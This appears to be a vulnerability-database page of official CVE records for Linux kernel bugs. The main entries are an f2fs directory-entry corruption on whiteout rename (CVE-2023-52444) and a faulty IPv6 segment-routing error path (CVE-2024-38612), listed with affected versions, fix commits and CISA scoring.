"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52454",
"datePublished": "2024-02-23T14:46:17.827Z",
"dateReserved": "2024-02-20T12:30:33.293Z",
"dateUpdated": "2025-05-04T07:36:52.616Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52444 (GCVE-0-2023-52444)
Vulnerability from cvelistv5
Published
2024-02-22 16:21
Modified
2025-05-04 07:36
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix to avoid dirent corruption
As Al reported in link[1]:
f2fs_rename()
...
if (old_dir != new_dir && !whiteout)
f2fs_set_link(old_inode, old_dir_entry,
old_dir_page, new_dir);
else
f2fs_put_page(old_dir_page, 0);
You want correct inumber in the ".." link. And cross-directory
rename does move the source to new parent, even if you'd been asked
to leave a whiteout in the old place.
[1] https://lore.kernel.org/all/20231017055040.GN800259@ZenIV/
With below testcase, it may cause dirent corruption, due to it missed
to call f2fs_set_link() to update ".." link to new directory.
- mkdir -p dir/foo
- renameat2 -w dir/foo bar
[ASSERT] (__chk_dots_dentries:1421) --> Bad inode number[0x4] for '..', parent parent ino is [0x3]
[FSCK] other corrupted bugs [Fail]
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 7e01e7ad746bc8198a8b46163ddc73a1c7d22339 Version: 7e01e7ad746bc8198a8b46163ddc73a1c7d22339 Version: 7e01e7ad746bc8198a8b46163ddc73a1c7d22339 Version: 7e01e7ad746bc8198a8b46163ddc73a1c7d22339 Version: 7e01e7ad746bc8198a8b46163ddc73a1c7d22339 Version: 7e01e7ad746bc8198a8b46163ddc73a1c7d22339 Version: 7e01e7ad746bc8198a8b46163ddc73a1c7d22339 Version: 7e01e7ad746bc8198a8b46163ddc73a1c7d22339 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52444",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-02-26T17:55:52.107706Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:03.571Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T22:55:41.853Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/02160112e6d45c2610b049df6eb693d7a2e57b46"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5624a3c1b1ebc8991318e1cce2aa719542991024"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6f866885e147d33efc497f1095f35b2ee5ec7310"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f100ba617d8be6c98a68f3744ef7617082975b77"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f0145860c20be6bae6785c7a2249577674702ac7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d3c0b49aaa12a61d560528f5d605029ab57f0728"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2fb4867f4405aea8c0519d7d188207f232a57862"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/53edb549565f55ccd0bdf43be3d66ce4c2d48b28"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/f2fs/namei.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "02160112e6d45c2610b049df6eb693d7a2e57b46",
"status": "affected",
"version": "7e01e7ad746bc8198a8b46163ddc73a1c7d22339",
"versionType": "git"
},
{
"lessThan": "5624a3c1b1ebc8991318e1cce2aa719542991024",
"status": "affected",
"version": "7e01e7ad746bc8198a8b46163ddc73a1c7d22339",
"versionType": "git"
},
{
"lessThan": "6f866885e147d33efc497f1095f35b2ee5ec7310",
"status": "affected",
"version": "7e01e7ad746bc8198a8b46163ddc73a1c7d22339",
"versionType": "git"
},
{
"lessThan": "f100ba617d8be6c98a68f3744ef7617082975b77",
"status": "affected",
"version": "7e01e7ad746bc8198a8b46163ddc73a1c7d22339",
"versionType": "git"
},
{
"lessThan": "f0145860c20be6bae6785c7a2249577674702ac7",
"status": "affected",
"version": "7e01e7ad746bc8198a8b46163ddc73a1c7d22339",
"versionType": "git"
},
{
"lessThan": "d3c0b49aaa12a61d560528f5d605029ab57f0728",
"status": "affected",
"version": "7e01e7ad746bc8198a8b46163ddc73a1c7d22339",
"versionType": "git"
},
{
"lessThan": "2fb4867f4405aea8c0519d7d188207f232a57862",
"status": "affected",
"version": "7e01e7ad746bc8198a8b46163ddc73a1c7d22339",
"versionType": "git"
},
{
"lessThan": "53edb549565f55ccd0bdf43be3d66ce4c2d48b28",
"status": "affected",
"version": "7e01e7ad746bc8198a8b46163ddc73a1c7d22339",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/f2fs/namei.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.2"
},
{
"lessThan": "4.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.306",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.268",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.306",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.268",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nf2fs: fix to avoid dirent corruption\n\nAs Al reported in link[1]:\n\nf2fs_rename()\n...\n\tif (old_dir != new_dir \u0026\u0026 !whiteout)\n\t\tf2fs_set_link(old_inode, old_dir_entry,\n\t\t\t\t\told_dir_page, new_dir);\n\telse\n\t\tf2fs_put_page(old_dir_page, 0);\n\nYou want correct inumber in the \"..\" link. And cross-directory\nrename does move the source to new parent, even if you\u0027d been asked\nto leave a whiteout in the old place.\n\n[1] https://lore.kernel.org/all/20231017055040.GN800259@ZenIV/\n\nWith below testcase, it may cause dirent corruption, due to it missed\nto call f2fs_set_link() to update \"..\" link to new directory.\n- mkdir -p dir/foo\n- renameat2 -w dir/foo bar\n\n[ASSERT] (__chk_dots_dentries:1421) --\u003e Bad inode number[0x4] for \u0027..\u0027, parent parent ino is [0x3]\n[FSCK] other corrupted bugs [Fail]"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:36:40.605Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/02160112e6d45c2610b049df6eb693d7a2e57b46"
},
{
"url": "https://git.kernel.org/stable/c/5624a3c1b1ebc8991318e1cce2aa719542991024"
},
{
"url": "https://git.kernel.org/stable/c/6f866885e147d33efc497f1095f35b2ee5ec7310"
},
{
"url": "https://git.kernel.org/stable/c/f100ba617d8be6c98a68f3744ef7617082975b77"
},
{
"url": "https://git.kernel.org/stable/c/f0145860c20be6bae6785c7a2249577674702ac7"
},
{
"url": "https://git.kernel.org/stable/c/d3c0b49aaa12a61d560528f5d605029ab57f0728"
},
{
"url": "https://git.kernel.org/stable/c/2fb4867f4405aea8c0519d7d188207f232a57862"
},
{
"url": "https://git.kernel.org/stable/c/53edb549565f55ccd0bdf43be3d66ce4c2d48b28"
}
],
"title": "f2fs: fix to avoid dirent corruption",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52444",
"datePublished": "2024-02-22T16:21:37.043Z",
"dateReserved": "2024-02-20T12:30:33.291Z",
"dateUpdated": "2025-05-04T07:36:40.605Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-38612 (GCVE-0-2024-38612)
Vulnerability from cvelistv5
Published
2024-06-19 13:56
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ipv6: sr: fix invalid unregister error path
The error path of seg6_init() is wrong in case CONFIG_IPV6_SEG6_LWTUNNEL
is not defined. In that case if seg6_hmac_init() fails, the
genl_unregister_family() isn't called.
This issue exist since commit 46738b1317e1 ("ipv6: sr: add option to control
lwtunnel support"), and commit 5559cea2d5aa ("ipv6: sr: fix possible
use-after-free and null-ptr-deref") replaced unregister_pernet_subsys()
with genl_unregister_family() in this error path.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 46738b1317e169b281ad74690276916e24d1be6d Version: 46738b1317e169b281ad74690276916e24d1be6d Version: 46738b1317e169b281ad74690276916e24d1be6d Version: 46738b1317e169b281ad74690276916e24d1be6d Version: 46738b1317e169b281ad74690276916e24d1be6d Version: 46738b1317e169b281ad74690276916e24d1be6d Version: 46738b1317e169b281ad74690276916e24d1be6d Version: 46738b1317e169b281ad74690276916e24d1be6d Version: 46738b1317e169b281ad74690276916e24d1be6d |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "0610575a3ac",
"status": "affected",
"version": "46738b1317e1",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "646cd236c55e",
"status": "affected",
"version": "46738b1317e1",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "00e6335329f2",
"status": "affected",
"version": "46738b1317e1",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "1a63730fb315",
"status": "affected",
"version": "46738b1317e1",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "e77a3ec7ada8",
"status": "affected",
"version": "46738b1317e1",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "3398a40dccb8",
"status": "affected",
"version": "46738b1317e1",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "85a70ff1e572",
"status": "affected",
"version": "46738b1317e1",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "c04d6a914e89",
"status": "affected",
"version": "46738b1317e1",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "160e9d275218",
"status": "affected",
"version": "46738b1317e1",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "4.10"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "4.10",
"status": "unaffected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "4.20",
"status": "unaffected",
"version": "4.19.316",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "5.5",
"status": "unaffected",
"version": "5.4.278",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:acrn:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "acrn",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "5.11",
"status": "unaffected",
"version": "5.10.219",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "5.16",
"status": "unaffected",
"version": "5.15.161",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.2",
"status": "unaffected",
"version": "6.1.93",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.7",
"status": "unaffected",
"version": "6.6.33",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.9",
"status": "unaffected",
"version": "6.8.12",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.10",
"status": "unaffected",
"version": "6.9.3",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.10-rc1"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-38612",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-25T14:07:52.263547Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476 NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-25T14:37:58.950Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:46.235Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/10610575a3ac2a702bf5c57aa931beaf847949c7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/646cd236c55e2cb5f146fc41bbe4034c4af5b2a4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/00e6335329f23ac6cf3105931691674e28bc598c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1a63730fb315bb1bab97edd69ff58ad45e04bb01"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e77a3ec7ada84543e75722a1283785a6544de925"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3398a40dccb88d3a7eef378247a023a78472db66"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/85a70ff1e572160f1eeb096ed48d09a1c9d4d89a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c04d6a914e890ccea4a9d11233009a2ee7978bf4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/160e9d2752181fcf18c662e74022d77d3164cd45"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv6/seg6.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "10610575a3ac2a702bf5c57aa931beaf847949c7",
"status": "affected",
"version": "46738b1317e169b281ad74690276916e24d1be6d",
"versionType": "git"
},
{
"lessThan": "646cd236c55e2cb5f146fc41bbe4034c4af5b2a4",
"status": "affected",
"version": "46738b1317e169b281ad74690276916e24d1be6d",
"versionType": "git"
},
{
"lessThan": "00e6335329f23ac6cf3105931691674e28bc598c",
"status": "affected",
"version": "46738b1317e169b281ad74690276916e24d1be6d",
"versionType": "git"
},
{
"lessThan": "1a63730fb315bb1bab97edd69ff58ad45e04bb01",
"status": "affected",
"version": "46738b1317e169b281ad74690276916e24d1be6d",
"versionType": "git"
},
{
"lessThan": "e77a3ec7ada84543e75722a1283785a6544de925",
"status": "affected",
"version": "46738b1317e169b281ad74690276916e24d1be6d",
"versionType": "git"
},
{
"lessThan": "3398a40dccb88d3a7eef378247a023a78472db66",
"status": "affected",
"version": "46738b1317e169b281ad74690276916e24d1be6d",
"versionType": "git"
},
{
"lessThan": "85a70ff1e572160f1eeb096ed48d09a1c9d4d89a",
"status": "affected",
"version": "46738b1317e169b281ad74690276916e24d1be6d",
"versionType": "git"
},
{
"lessThan": "c04d6a914e890ccea4a9d11233009a2ee7978bf4",
"status": "affected",
"version": "46738b1317e169b281ad74690276916e24d1be6d",
"versionType": "git"
},
{
"lessThan": "160e9d2752181fcf18c662e74022d77d3164cd45",
"status": "affected",
"version": "46738b1317e169b281ad74690276916e24d1be6d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv6/seg6.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.10"
},
{
"lessThan": "4.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.12",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.3",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: sr: fix invalid unregister error path\n\nThe error path of seg6_init() is wrong in case CONFIG_IPV6_SEG6_LWTUNNEL\nis not defined. In that case if seg6_hmac_init() fails, the\ngenl_unregister_family() isn\u0027t called.\n\nThis issue exist since commit 46738b1317e1 (\"ipv6: sr: add option to control\nlwtunnel support\"), and commit 5559cea2d5aa (\"ipv6: sr: fix possible\nuse-after-free and null-ptr-deref\") replaced unregister_pernet_subsys()\nwith genl_unregister_family() in this error path."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:15:17.249Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/10610575a3ac2a702bf5c57aa931beaf847949c7"
},
{
"url": "https://git.kernel.org/stable/c/646cd236c55e2cb5f146fc41bbe4034c4af5b2a4"
},
{
"url": "https://git.kernel.org/stable/c/00e6335329f23ac6cf3105931691674e28bc598c"
},
{
"url": "https://git.kernel.org/stable/c/1a63730fb315bb1bab97edd69ff58ad45e04bb01"
},
{
"url": "https://git.kernel.org/stable/c/e77a3ec7ada84543e75722a1283785a6544de925"
},
{
"url": "https://git.kernel.org/stable/c/3398a40dccb88d3a7eef378247a023a78472db66"
},
{
"url": "https://git.kernel.org/stable/c/85a70ff1e572160f1eeb096ed48d09a1c9d4d89a"
},
{
"url": "https://git.kernel.org/stable/c/c04d6a914e890ccea4a9d11233009a2ee7978bf4"
},
{
"url": "https://git.kernel.org/stable/c/160e9d2752181fcf18c662e74022d77d3164cd45"
}
],
"title": "ipv6: sr: fix invalid unregister error path",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38612",
"datePublished": "2024-06-19T13:56:13.415Z",
"dateReserved": "2024-06-18T19:36:34.944Z",
"dateUpdated": "2025-11-04T17:21:46.235Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…
Loading…